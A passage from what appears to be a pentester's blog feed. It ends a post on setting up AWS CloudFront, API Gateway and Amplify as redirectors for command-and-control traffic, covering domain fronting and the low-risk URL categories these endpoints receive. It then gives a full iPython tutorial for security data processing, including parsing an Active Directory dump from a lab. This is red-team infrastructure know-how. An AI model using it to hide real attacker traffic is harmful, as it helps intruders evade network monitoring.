<p>If access via a custom domain is required, the domain needs to have a SSL certificate added with all desired names (e.g. domain.com, www.domain.com)for the domain in the us-east-1 region (N.Virginia) region. That certificate can then be selected in the Custom SSL Certificate section of the Distributions settings. The names in the certificate should include all of the Alternate Domain Name (CNAME) entries in the distribution. A link to the appropriate section of the AWS console to create the certificate is shown in the wizard for creating a CloudFront distribution.</p>
<p>Other than the two previously mentioned options, the other important values to set in the distribution relate to forwarding behavior - specifically the caching and allowable HTTP methods. Allow all HTTP methods and use Legacy cache settings selecting All for Headers, Query strings and Cookies.</p>
<p>The distribution domain name will be provided in the settings.</p>
<h2 id="api-gateway-direct-proxying">API Gateway direct proxying</h2>
<p><strong>Summary</strong></p>
<ul>
<li><strong><em>URL format</em></strong>: <code class="language-plaintext highlighter-rouge">https://<random_10_char_value>.execute-api.<region_name>.amazonaws.com/</code></li>
<li><strong><em>HTTPS certificate</em></strong>: Valid certificate automatically provided on API Gateway creation</li>
<li><strong><em>Palo Alto URL categories</em></strong>: <code class="language-plaintext highlighter-rouge">Computer and Internet Info</code>, <code class="language-plaintext highlighter-rouge">Low Risk</code></li>
<li><strong><em>Domain fronting</em></strong>: Works via Host header manipulation for HTTP and HTTPS for valid API Gateway domains in the same region and of the same type (REST or HTTP)</li>
</ul>
<p><strong>Setup</strong></p>
<p>The API Gateway direct proxying approach allows you to forward to an Internet accessible URI or a private resource. For cases where the C2 sits in the same AWS account as the forwarding service, a private resource is preferrable as it does not require that you expose your C2 service directly on the Internet and you can save on AWS network traffic transit costs. For a private resource you can forward to a load balancer or a Cloud Map service that points to one or more services running on cloud resources (e.g. web servers on EC2 instances) that you want to receive your forwarded traffic. I chose to use a Cloud Map service pointing to port 80 on an EC2 instance as it was more cost effective than a load balancer. Seeing as the forwarded traffic is internal to my AWS account I was forwarding it as HTTP not HTTPS.</p>
<p>The following instructions explain how to setup proxying to a Cloud Map service that will point to a target EC2 instance. Take note of the target EC2 instances private IP address, VPC and subnet before starting as these details will be required:</p>
<ol>
<li>
<p>Setup a AWS Cloud Map namespace supporting <code class="language-plaintext highlighter-rouge">API calls and DNS queries in VPCs</code>. You can put it in the same VPC as your destination EC2 instance.</p>
</li>
<li>
<p>Create a cloud map <code class="language-plaintext highlighter-rouge">API and DNS</code> service within the namespace crated in step 1.</p>
</li>
<li>
<p>Create a service instance within the service created in step 2. This service instance should point to the private IP address of the target EC2 instance and TCP port 80.</p>
</li>
<li>
<p>Create a security group in the VPC/subnet where the target EC2 instance resides that can be used to associate with a VPC link. This will be used to allow the VPC link and hence the API gateway to talk <strong>TO</strong> the destination EC2 instance.</p>
</li>
<li>
<p>Add a rule to the target EC2 instances security group that allows connections <strong>FROM</strong> the security group created in step 4 to the same service port configured in the Cloud Map service instance (e.g. 80/HTTP).</p>
</li>
<li>
<p>Create an API Gateway VPC link for HTTP APIs to provide a path for the API Gateway to communicate with the VPC and subnet where the destination EC2 instance resides.</p>
</li>
<li>
<p>Associate the VPC link created in step 6 with the VPC and subnet that the target EC2 instance resides in and the security group created in step 4.</p>
</li>
<li>
<p>Create a API Gateway <code class="language-plaintext highlighter-rouge">HTTP</code> API instance, without creating an initial integration. Keep the default <code class="language-plaintext highlighter-rouge">$default</code> deployment stage with automated deployment.</p>
</li>
<li>
<p>In the new API gateway, create a route with pattern <code class="language-plaintext highlighter-rouge">/{proxy+}</code> resource for the <code class="language-plaintext highlighter-rouge">ANY</code> method.</p>
</li>
<li>
<p>In the new API gateway, create a private resource integration that points to the Cloud Map service created in step 2. Associate the VPC link created in step 7 with the integration.</p>
</li>
<li>
<p>Attach the integration created in step 9 to the route created in step 8.</p>
</li>
</ol>
<p>The invoke URL will be shown in the stage configuration page.</p>
<h2 id="aws-amplify-application">AWS Amplify application</h2>
<p><strong>Summary</strong></p>
<ul>
<li><strong><em>URL format</em></strong>: <code class="language-plaintext highlighter-rouge">https://<stage_name>.<14_character_random_value>.amplifyapp.com/</code></li>
<li><strong><em>HTTPS certificate</em></strong>: Valid certificate automatically provided on API Gateway creation</li>
<li><strong><em>Palo Alto URL categories</em></strong>: <code class="language-plaintext highlighter-rouge">Business and Economy</code>, <code class="language-plaintext highlighter-rouge">Low Risk</code></li>
<li><strong><em>Domain fronting</em></strong>: Delivered through the CloudFront CDN, the same domain fronting conditions for CloudFlare as discussed above apply</li>
</ul>
<p><strong>Setup</strong></p>
<p>The AWS Amplify fronting method requires an Internet accessible URI to forward traffic to. When you have this you can create an Amplify application with an empty code deployment and then configure rewriting to redirect all requests to the application to your desired site. The site is delivered via CloudFront and visitors to the site wont be able to tell they are being redirected. Setup like so:</p>
<ol>
<li>Create a new AWS Amplify hosted environment. Choose a manual file upload based distribution and upload an empty zip file. Something like the following can be used to create a zip file test1.zip in the PWD from empty folder /tmp/test.</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python -c 'import shutil; shutil.make_archive("test1", "zip", "/tmp/test")'
</code></pre></div></div>
<ol>
<li>Then in the Rewrites and Redirects section of the settings, add a redirect from source <code class="language-plaintext highlighter-rouge">/<*></code> to target <code class="language-plaintext highlighter-rouge">https://web.site/<*></code> (or your custom destination) of type <code class="language-plaintext highlighter-rouge">200 (Rewrite)</code></li>
</ol>
<p>Once configured the URL for the app will be available in a few locations throughout the Amplify interface.</p>Stephen BradshawRecently I’ve been looking into options for abusing AWS services to forward HTTP Command and Control (C2) traffic. This post will talk about a number of approaches for this I found discussed on the Internet as well as a few options that I identified myself.iPython for cyber security data processing and automation2023-08-16T07:12:00+00:002023-08-16T07:12:00+00:00/2023/08/16/iPython-for-cyber-security<p>A lot of my day job in pentesting/offensive security involves processing varied chunks of data, and ad hoc automation of tasks. For the last several years, Ive been using iPython, the interactive Python environment to do this. While iPython has pretty wide use in various other computing fields, to my knowledge it’s not used very widely in security. Whenever I have the rare opportunity to demonstrate how I use it to other pentesters however, they seem to be impressed by how useful it is. This post will be an attempt to explain why I think iPython is so useful for security related workflows.</p>
<h1 id="what-is-ipython-and-what-are-the-basics-of-using-it">What is iPython and what are the basics of using it?</h1>
<p>iPython is essentially a souped up version of a Python REPL (Read Evaluate Print Loop) - very much like what you get when you run python with no input script, but way more usable.</p>
<p>Being a REPL, what iPython does at its core is run code snippets, provide any output, and return to a prompt to allow you to repeat the process.</p>
<p>The following shows me starting iPython and using print to output a simple string.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@mac:~$ ipython
Python 3.10.12 (main, Jun 10 2023, 16:04:55) [Clang 14.0.3 (clang-1403.0.22.14.1)]
Type 'copyright', 'credits' or 'license' for more information
IPython 8.3.0 -- An enhanced Interactive Python. Type '?' for help.
In [1]: print('Hello from iPython!')
Hello from iPython!
</code></pre></div></div>
<p>Each input and output are numbered. Just entering a string in iPython returns that string as output, labelled below as <code class="language-plaintext highlighter-rouge">Out[2]</code>. I can retrieve that some output again in a subsequent input, by referencing it by name.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
In [2]: 'Hello'
Out[2]: 'Hello'
In [3]: Out[2]
Out[3]: 'Hello'
</code></pre></div></div>
<p>This means that you dont lose access to output generated in previous steps if you want to refer to it again later in your processing.</p>
<p>You can print a history of commands, to see what you have run so far.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [4]: history
print('Hello from iPython!')
'Hello'
Out[2]
history
</code></pre></div></div>
<p>You can also assign output to variables explicitly, and then access them by name in later operations.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [5]: myvariable = 5412
In [6]: myvariable
Out[6]: 5412
</code></pre></div></div>
<p>iPython also has a startup file, that you can use to specify code you want available to you in each session you start. On *nix systems, this file is located at <code class="language-plaintext highlighter-rouge">~/.ipython/profile_default/startup/startup.py</code>.</p>
<p>My startup file on each machine I use regularly contains one line, which I will explain in the following section.</p>
<h1 id="using-ipython-to-debug-python-scripts-or-run-code-from-external-scripts">Using iPython to debug Python scripts or run code from external scripts</h1>
<p>One great use of iPython is to act as a debugging and testing environment when creating larger Python programs. If you’re writing a Python program which contains a standalone function to perform some particular task, and want to quickly test that function, running this within iPython is a great way to achieve this.</p>
<p>To facilitate this, you may want to put sections of Python code in a file on disk and import them into iPython to run them interactively.</p>
<p>My iPython startup file contains the following to do exactly this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>coder = lambda x : compile(open(x).read(), x, 'exec')
</code></pre></div></div>
<p>This is a helper lambda (one liner function) called <code class="language-plaintext highlighter-rouge">coder</code> that assists with reading Python content from an external file and executing it. This is written to be executed using the inbuilt function <code class="language-plaintext highlighter-rouge">exec</code> to run the provided script in the context of the current session.</p>
<p>When you do this you will get access to any local variables in the script in your iPython session. The following shows importing a two liner script <code class="language-plaintext highlighter-rouge">pythoncode.py</code> into the current session, and demonstrates how the variable <code class="language-plaintext highlighter-rouge">variablex</code> from the script is then available locally.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [7]: cat pythoncode.py
print('this is python code')
variablex = 'contents'
In [8]: exec(coder('pythoncode.py'))
this is python code
In [9]: variablex
Out[9]: 'contents'
</code></pre></div></div>
<p>You may notice from the above that we are able to run operating system commands such as <code class="language-plaintext highlighter-rouge">cat</code>, to display the contents of local files.</p>
<p>If the Python code we execute has any errors, this will also provide us with helpful output that identifies where the problem is. Lets look at an example of trying to import code with errors in file <code class="language-plaintext highlighter-rouge">badcode.py</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [10]: cat badcode.py
print('Good line')
invalid python
In [11]: exec(coder('badcode.py'))
Traceback (most recent call last):
File /opt/local/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/IPython/core/interactiveshell.py:3397 in run_code
exec(code_obj, self.user_global_ns, self.user_ns)
Input In [11] in <cell line: 1>
exec(coder('badcode.py'))
File ~/.ipython/profile_default/startup/startup.py:1 in <lambda>
coder = lambda x : compile(open(x).read(), x, 'exec')
File badcode.py:2
invalid python
^
SyntaxError: invalid syntax
</code></pre></div></div>
<p>We can see this output identifies exactly where in the external script the error is.</p>
<h1 id="magic-commands-and-ipython-conveniences">Magic commands and iPython conveniences</h1>
<p>iPython has a number of useful <a href="https://ipython.readthedocs.io/en/stable/interactive/magics.html">magic commands</a> that try to make common actions easier.</p>
<p>For example, copy the following text into your clipboard.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>print('these')
print('are')
print('multiple')
print('lines')
print('of')
print('code')
</code></pre></div></div>
<p>Then enter the command <code class="language-plaintext highlighter-rouge">%paste</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [12]: %paste
print('these')
print('are')
print('multiple')
print('lines')
print('of')
print('code')
## -- End pasted text --
these
are
multiple
lines
of
code
</code></pre></div></div>
<p>The code in the clipboard is automatically entered and executed.</p>
<p>iPython is also helpful in other ways. It can autocomplete filenames and paths, python code (like in some good IDEs), and it also can autocomplete from your command history.</p>
<h1 id="some-useful-python-concepts">Some useful Python concepts</h1>
<p>Beyond the basics discussed above, making effective use of iPython relies on your knoweldge of Python coding.</p>
<p>Before I go into specific code examples however, I want to specifically introduce a few concepts that are very useful when operating in a Python REPL.</p>
<h2 id="comprehensions">Comprehensions</h2>
<p>Comprehensives are a hugely useful way of succinctly specifying iterative operations. It creates a collection containing the results of the operation, with the type of the data structure used defined depending on the syntax used.</p>
<p>The simplest example I can think of is this <a href="https://docs.python.org/3/tutorial/datastructures.html">list</a> comprehension below. It simply creates a list of each element in the python range of 1-4.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [16]: [a for a in range(1,5)]
Out[16]: [1, 2, 3, 4]
</code></pre></div></div>
<p>The basic format demonstrated here is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[<result> for <item> in <iterable>]
</code></pre></div></div>
<p>In this most basic of examples:</p>
<ul>
<li>The comprehension is wrapped in square brackets <code class="language-plaintext highlighter-rouge">[]</code>, indicating that the output will be a <code class="language-plaintext highlighter-rouge">list</code>,</li>
<li><code class="language-plaintext highlighter-rouge"><result></code> is the value that gets returned for each iteration of the loop,</li>
<li><code class="language-plaintext highlighter-rouge"><item></code> is the variable name to which each individual item from the iterable is assigned to <em>in that instance of the loop</em>, and</li>
<li><code class="language-plaintext highlighter-rouge"><iterable></code> is the collection being processed.</li>
</ul>
<p>In the case above, <code class="language-plaintext highlighter-rouge"><result></code> is the same as <code class="language-plaintext highlighter-rouge"><item></code>, but this can be changed by additional processing as you will see in future examples.</p>
<p>As well as for lists, comprehensions can also be used in different contexts, such as for <a href="https://docs.python.org/3/tutorial/datastructures.html#dictionaries">dictionaries</a>, as in the example below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [18]: {a: 'hello' for a in range(1,5)}
Out[18]: {1: 'hello', 2: 'hello', 3: 'hello', 4: 'hello'}
</code></pre></div></div>
<p>The output type of the comprehension is defined by the internal syntax and the brackets wrapping the operation, e.g. <code class="language-plaintext highlighter-rouge">[]</code> list, <code class="language-plaintext highlighter-rouge">{}</code> set/dictionary, or <code class="language-plaintext highlighter-rouge">()</code> generator.</p>
<p>Comprehensions can also be nested to arbitrary levels, contain conditions and perform additional operations on the elements of the output. They can get ridiculously complex, and can take some getting used to in their more complex iterations. However they are incredibly powerful and useful in iPython interactive computing. More complex comprehensions will be included in the examples below.</p>
<h2 id="lambdas">Lambdas</h2>
<p>Lambdas are one line functions. You have seen one example of these already from my <code class="language-plaintext highlighter-rouge">coder</code> startup function. Heres another example where I define a new lambda named <code class="language-plaintext highlighter-rouge">mylambda</code>, with input variables <code class="language-plaintext highlighter-rouge">x</code> and <code class="language-plaintext highlighter-rouge">y</code>, and then execute it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [19]: mylambda = lambda x, y : print('Hello {}, its {}'.format(x, y))
In [20]: mylambda('you', 'good to see you!')
Hello you, its good to see you!
</code></pre></div></div>
<h1 id="common-tasks-performed-in-python">Common tasks performed in Python</h1>
<p>Now lets look at some specific examples of common tasks that will be very helpful to know about in order to make effective use of iPython for security data processing.</p>
<h2 id="reading-a-file">Reading a file</h2>
<p>Reading a text file is as easy as the below. Here we read text file <code class="language-plaintext highlighter-rouge">file1.txt</code>, which contains 5 lines.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [21]: filecontents = open('file1.txt').read()
In [22]: filecontents
Out[22]: 'Line 1\nLine 2\nLine 3\nLine 4\nLine 5\n'
</code></pre></div></div>
<p>For a binary file, we can specify <code class="language-plaintext highlighter-rouge">b</code> binary mode. We also need to specifically set the operation mode to <code class="language-plaintext highlighter-rouge">r</code> read.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [24]: binarycontents = open('binary.bin', 'rb').read()
In [25]: binarycontents
Out[25]: b'\xde\xad\x01\x01'
</code></pre></div></div>
<h2 id="writing-a-file">Writing a file</h2>
<p>Writing a text file can be done like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [27]: open('file2.txt', 'w').write('Line 1\nLine 2')
Out[27]: 13
</code></pre></div></div>
<p>A binary file can be written to like so. Note that I am setting binary mode with <code class="language-plaintext highlighter-rouge">b</code> and also specifying a byte sequence (prefacing the string with <code class="language-plaintext highlighter-rouge">b</code>) as the input to write.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [28]: open('binary2.bin', 'wb').write(b'\x00\x00\x01')
Out[28]: 3
</code></pre></div></div>
<h2 id="reading-files">Reading files++</h2>
<p>While its important to understand the basic process of opening and reading from a file for specific use cases or in case of problems, we usually want to do some specific things with files we read.</p>
<p>What about reading each line of a file into a list, while ignoring any blank lines in the file?</p>
<p>Lets use a list comprehension to split on newline <code class="language-plaintext highlighter-rouge">\n</code> and only process that line if it has a value. We will use the same text file read earlier, with 5 lines.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [29]: filelines = [a for a in open('file1.txt').read().split('\n') if a]
In [30]: filelines[0]
Out[30]: 'Line 1'
In [31]: len(filelines)
Out[31]: 5
In [32]: filelines[-1]
Out[32]: 'Line 5'
</code></pre></div></div>
<p>Theres a few things going on here to explain. We have taken the basic format of the comprehension as explained above and extended it a little by adding a condition.</p>
<p>So the basic format that we explained above is like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[<variable> for <variable> in <iterable>]
</code></pre></div></div>
<p>This has now been extended to the following form:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[<variable> for <variable> in <iterable> if <condition>]
</code></pre></div></div>
<p>When a condition is specified in the comprehension, only items from the iterable that satisfy the condition are processed further and included in the output.</p>
<p>We can do even more however. Assume we want to seperate each line of the input into multiple variables on the space character.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [33]: filelines_space_separated = [a.split(' ') for a in open('file1.txt').read().split('\n') if a]
In [34]: filelines_space_separated[0]
Out[34]: ['Line', '1']
</code></pre></div></div>
<p>Now our list comprehension is performing an operation on each item from the iterable (which iterates through each line of the file):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[<operation>(<variable>) for <variable> in <iterable> if <condition>]
</code></pre></div></div>
<h2 id="reading-and-writing-json">Reading and writing JSON</h2>
<p>JSON is a great format for exchanging semi complex data structures with other applications, and writing them from within Python to disk. Lets look at a simple example of using it in iPython.</p>
<p>Heres some data in a Python dictionary (<code class="language-plaintext highlighter-rouge">dict</code>):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [35]: data = {'one' : 1, "two": 2}
</code></pre></div></div>
<p>Import the json library</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [36]: import json
</code></pre></div></div>
<p>Write the data to a JSON file on disk, with indenting. Then dumping the data with cat to show its respresentation on disk.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [37]: open('data.json', 'w').write(json.dumps(data, indent=4))
Out[37]: 30
In [38]: cat data.json
{
"one": 1,
"two": 2
}
</code></pre></div></div>
<p>We can also read the data back in from JSON format on disk into a Python representation in memory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [39]: read_data = json.load(open('data.json'))
In [40]: read_data
Out[40]: {'one': 1, 'two': 2}
In [41]: read_data['one']
Out[41]: 1
</code></pre></div></div>
<p>Some more detailed examples of processing complex JSON files are included later in this post.</p>
<h2 id="making-http-requests">Making HTTP requests</h2>
<p>One very common activity in security work flows is making a HTTP request. We can do this easily in Python with the <code class="language-plaintext highlighter-rouge">requests</code> module. You will need to install this on your machine first, which you can do with pip (e.g. <code class="language-plaintext highlighter-rouge">pip install requests</code>).</p>
<p>Heres importing the module, making a simple request and looking at some response details:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [42]: import requests
In [43]: response = requests.get('https://github.com/')
In [44]: response.status_code
Out[44]: 200
In [45]: response.content[:100]
Out[45]: b'\n\n\n\n\n\n<!DOCTYPE html>\n<html lang="en" data-a11y-animated-images="system">\n <head>\n <meta chars'
</code></pre></div></div>
<p>Make a HTTPS request, but ignore certificate errors.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [46]: requests.packages.urllib3.disable_warnings()
In [47]: response2 = requests.get('https://192.168.10.34:5001/', verify=False)
In [48]: response2.status_code
Out[48]: 200
</code></pre></div></div>
<h2 id="run-an-operating-system-command-and-get-the-output-for-processing">Run an Operating System command and get the output for processing</h2>
<p>Run the Operating System <code class="language-plaintext highlighter-rouge">cat</code> command to read <code class="language-plaintext highlighter-rouge">data.json</code>, and put the output into the <code class="language-plaintext highlighter-rouge">output</code> variable.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [51]: import subprocess
In [52]: output = subprocess.check_output(['cat', 'data.json']).decode()
In [53]: output
Out[53]: '{\n "one": 1,\n "two": 2\n}'
</code></pre></div></div>
<p>Running <code class="language-plaintext highlighter-rouge">decode</code> on the output converts it from byte format to a string.</p>
<h2 id="more">More…</h2>
<p>Ive got a bunch of other Python code snippets listed <a href="https://thegreycorner.com/pentesting_stuff/writeups/pythonsnippets.html">here</a> for performing other common infosec related tasks.</p>
<h1 id="exploring-data-by-example-active-directory">Exploring data by example: Active Directory</h1>
<p>I wrote a tool for dumping Active Directory data that can be found <a href="https://github.com/stephenbradshaw/ad_ldap_dumper">here</a>. Though I plan to add Bloodhound output support at some point, at the moment I mainly analyse the results from this in iPython.</p>
<p>Examining the output from this tool provides a really good example of how to use iPython to explore a complex dataset and get useful information out of it. The general approaches used here can be adapted to other datasets if they can be converted to native Python datatypes first.</p>
<p>If you want to follow along, and dont already have your own Active Directory environment to query with the tool, you can set one up using something like <a href="https://github.com/clong/detectionlab">DetectionLab</a> or <a href="https://github.com/Orange-Cyberdefense/GOAD">GOAD</a>.</p>
<p>Now, lets get to it. The output from the AD dumping tool is in JSON format, so to properly process it using iPython we need to convert it into a native Python format, which we can do using the <code class="language-plaintext highlighter-rouge">json</code> module.</p>
<p>Import the json module if you havent done so already.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [54]: import json
</code></pre></div></div>
<p>Now import data from the output of the tool. This particular file contains a LDAP dump from one of my AD test environments.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [55]: ad_data = json.load(open('20230719062434_DCAC.TBDPW.LOCAL_AD_Dump.json'))
</code></pre></div></div>
<p>Now we have the data in the <code class="language-plaintext highlighter-rouge">ad_data</code> variable, lets explore it to try and understand what data is represented and how we can get useful information out of it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [57]: type(ad_data)
Out[57]: dict
</code></pre></div></div>
<p>The data is a dictionary (<code class="language-plaintext highlighter-rouge">dict</code>) type. This data type is essentially like a lookup table, with values indexed under keys. Lets start by checking what the keys are.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [58]: ad_data.keys()
Out[58]: dict_keys(['schema', 'containers', 'computers', 'domains', 'forests', 'gpos', 'groups', 'ous', 'trusted_domains', 'users', 'info', 'meta'])
</code></pre></div></div>
<p>So we have 12 different keys in this dictionary. Based on the key names, we could infer that a particular category of information is included under each of these keys. Lets explore further.</p>
<p>Now lets run a dictionary comprehension to see the type of each subobject associated with each key in the dictionary, and its length. For list objects this will be the number of items in the list, and for dict objects it will be the number of keys.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [62]: {a: [type(ad_data[a]), len(ad_data[a])] for a in ad_data.keys()}
Out[62]:
{'schema': [list, 1772],
'containers': [list, 124],
'computers': [list, 7],
'domains': [list, 1],
'forests': [list, 1],
'gpos': [list, 3],
'groups': [list, 55],
'ous': [list, 3],
'trusted_domains': [list, 0],
'users': [list, 8],
'info': [dict, 11],
'meta': [dict, 7]}
</code></pre></div></div>
<p>The above output shows that, for example, the subobject at <code class="language-plaintext highlighter-rouge">ad_data['users']</code> is a list, and contains 8 items.</p>
<p>This comprehension is a little more complex than the examples used so far in this post, so it might help to break it down a little.</p>
<p>We are using the dictionary comprehension syntax here, which is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{key : value for item in iterable}
</code></pre></div></div>
<p>The comprehension is wrapped in curly braces <code class="language-plaintext highlighter-rouge">{}</code>, indicating that this will either return a <code class="language-plaintext highlighter-rouge">set</code> or a dictionary (<code class="language-plaintext highlighter-rouge">dict</code>), depending on the specific syntax <em>within</em> the comprehension. This format has both a key and a value, so its a dictionary.</p>
<p>The iterable is <code class="language-plaintext highlighter-rouge">ad_data.keys()</code>, and the item is <code class="language-plaintext highlighter-rouge">a</code>, which means that for each iteration of the loop expressed in this comprehension, <code class="language-plaintext highlighter-rouge">a</code> will be set to a key from <code class="language-plaintext highlighter-rouge">ad_data</code>.</p>
<p>The <code class="language-plaintext highlighter-rouge">key</code> in this example is just <code class="language-plaintext highlighter-rouge">a</code>, so this creates a new dictionary with the same keys as <code class="language-plaintext highlighter-rouge">ad_data</code>.</p>
<p>The <code class="language-plaintext highlighter-rouge">value</code> is <code class="language-plaintext highlighter-rouge">[type(ad_data[a]), len(ad_data[a])]</code>. This creates another list, where the first item is the <code class="language-plaintext highlighter-rouge">type</code> of the value in <code class="language-plaintext highlighter-rouge">ad_data[a]</code>, and the second is the length of the value in <code class="language-plaintext highlighter-rouge">ad_data[a]</code>.</p>
<p>The intent of this example is to demonstrate how you can use comprehensions in iPython to explore complex data sets, to understand them and ultimately understand how to parse the data to extract useful information.</p>
<p>Given the context that this is Active Directory infomation, we can infer certain things about the data represented here, e.g. that users are likely contained in the <code class="language-plaintext highlighter-rouge">users</code> key, and there are 8 of them.</p>
<p>Lets look at the first object in the list of users to see what type of object it is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [66]: type(ad_data['users'][0])
Out[66]: dict
</code></pre></div></div>
<p>So its another dictionary. Lets look at the keys:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [67]: ad_data['users'][0].keys()
Out[67]: dict_keys(['objectClass', 'cn', 'sn', 'givenName', 'distinguishedName', 'instanceType', 'whenCreated', 'whenChanged', 'displayName', 'uSNCreated', 'memberOf', 'uSNChanged', 'nTSecurityDescriptor', 'name', 'objectGUID', 'userAccountControl', 'badPwdCount', 'codePage', 'countryCode', 'badPasswordTime', 'lastLogoff', 'lastLogon', 'pwdLastSet', 'primaryGroupID', 'objectSid', 'accountExpires', 'logonCount', 'sAMAccountName', 'sAMAccountType', 'userPrincipalName', 'objectCategory', 'dSCorePropagationData', 'mS-DS-ConsistencyGuid', 'lastLogonTimestamp', 'userAccountControlFlags', 'nTSecurityDescriptor_raw', 'domain', 'domainShort'])
</code></pre></div></div>
<p>These keys are representative of the LDAP fields for this type of object. Lets look at <code class="language-plaintext highlighter-rouge">sAMAccountName</code>, which is used to identify logon names:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [68]: ad_data['users'][0]['sAMAccountName']
Out[68]: 'tester'
</code></pre></div></div>
<p>Now lets grab the value for this field for each user object in which its defined.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [69]: [a['sAMAccountName'] for a in ad_data['users'] if 'sAMAccountName' in a]
Out[69]:
['tester',
'unpriv',
'attacker',
'MSOL_925bb72bf36b',
'krbtgt',
'vagrant',
'Guest',
'Administrator']
</code></pre></div></div>
<p>It turns out that the <code class="language-plaintext highlighter-rouge">sAMAccountName</code> field is defined for every user object in this case, so the <code class="language-plaintext highlighter-rouge">if</code> statement above is not strictly necessaryhere. Its good to know how to add this qualification to stop these comprehensions from failing in cases where the field is not present, however.</p>
<p>What about another field - <code class="language-plaintext highlighter-rouge">userAccountControlFlags</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [74]: ad_data['users'][0]['userAccountControlFlags']
Out[74]: ['NORMAL_ACCOUNT', 'DONT_EXPIRE_PASSWORD']
</code></pre></div></div>
<p>In the context of the LDAP dumping tool, this field is actually a parsed value, containing an interpreted list of the different flag values that are set in the <code class="language-plaintext highlighter-rouge">userAccountControl</code> field in the user account.</p>
<p>What about we try and get a list of all the unique values in this field across all the users in our data set? Another way of stating this is, what are all the configured user account control flags that are set for users in this Active Directory environment?</p>
<p>Heres how that comprehension would look:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [77]: set([b for a in ad_data['users'] if 'userAccountControlFlags' in a for b in a['userAccountControlFlags']])
Out[77]: {'ACCOUNTDISABLE', 'DONT_EXPIRE_PASSWORD', 'NORMAL_ACCOUNT', 'PASSWD_NOTREQD'}
</code></pre></div></div>
<p>This features yet another twist on our comprehension syntax, as we are adding another nested loop into the mix.</p>
<p>We first iterate through each user object in <code class="language-plaintext highlighter-rouge">ad_data['users']</code> and assign this to <code class="language-plaintext highlighter-rouge">a</code>, then we filter for values of <code class="language-plaintext highlighter-rouge">a</code> that have the <code class="language-plaintext highlighter-rouge">userAccountControl</code> field set.</p>
<p>THEN, we add a new iterator, where we assign items from each of the the lists <code class="language-plaintext highlighter-rouge">a['userAccountControlFlags']</code> to variable <code class="language-plaintext highlighter-rouge">b</code>.</p>
<p>We also use the variable <code class="language-plaintext highlighter-rouge">b</code> as the first value referenced in the comprehension, <em>because thats the value we want to return</em>.</p>
<p>So this <code class="language-plaintext highlighter-rouge">b</code> is set at the end of the comprehension’s code, but referenced at the start because we want to access it.</p>
<p>Finally we wrap the whole thing in <code class="language-plaintext highlighter-rouge">set()</code> to get only the unique values from the whole comprehension.</p>
<p>Now we can look at these flag values and query for accounts that have particular flags.</p>
<p>Lets look at accounts that are disabled (e.g. have the <code class="language-plaintext highlighter-rouge">ACCOUNTDISABLE</code> flag).</p>
<p>Here we use conditions in the <code class="language-plaintext highlighter-rouge">if</code> part of the comprehension to only return users who have the <code class="language-plaintext highlighter-rouge">ACCOUNTDISABLE</code> value in the <code class="language-plaintext highlighter-rouge">userAccountControlFlags</code> list, and we return the <code class="language-plaintext highlighter-rouge">sAMAccountName</code> logon name for those accounts.</p>
